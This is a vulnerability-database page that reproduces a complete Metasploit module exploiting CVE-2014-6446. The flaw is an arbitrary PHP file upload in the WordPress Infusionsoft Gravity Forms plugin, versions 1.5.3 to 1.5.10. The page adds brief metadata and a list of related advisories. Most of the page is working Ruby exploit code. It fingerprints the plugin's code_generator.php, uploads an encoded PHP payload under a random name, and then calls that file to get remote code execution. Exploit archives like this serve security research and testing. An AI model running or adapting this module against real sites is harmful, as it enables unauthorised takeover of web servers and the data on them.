Wordpress InfusionSoft Upload Exploit

🗓️ 09 Oct 2014 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 25 Views

Wordpress InfusionSoft arbitrary PHP code upload vulnerabilit

Reporter	Title	Published	Views	Family All 14
Gitee	Exploit for OS Command Injection in Gnu Bash	27 Jul 202504:29	–	gitee
Circl	CVE-2014-6446	9 Oct 201400:00	–	circl
CVE	CVE-2014-6446	26 Sep 201421:00	–	cve
Cvelist	CVE-2014-6446	26 Sep 201421:00	–	cvelist
Exploit DB	WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)	9 Oct 201400:00	–	exploitdb
Metasploit	Wordpress InfusionSoft Upload Vulnerability	23 Mar 201507:15	–	metasploit
NVD	CVE-2014-6446	26 Sep 201421:55	–	nvd
OpenVAS	WordPress Infusionsoft Gravity Forms Add-on Arbitrary File Upload Vulnerability	29 Sep 201400:00	–	openvas
Packet Storm	Wordpress InfusionSoft Upload	9 Oct 201400:00	–	packetstorm
Packet Storm	Wordpress InfusionSoft Shell Upload	24 Mar 201500:00	–	packetstorm

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'g0blin',                    # Vulnerability Discovery
          'us3r777 <[email protected]>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-6446'],
          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
      'DisclosureDate' => 'Sep 25 2014',
      'DefaultTarget'  => 0)
    )
  end

  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
    )

    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
      return Exploit::CheckCode::Detected
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', 'code_generator.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
    end

    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end

end

#  0day.today [2018-03-02]  #

09 Oct 2014 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.82212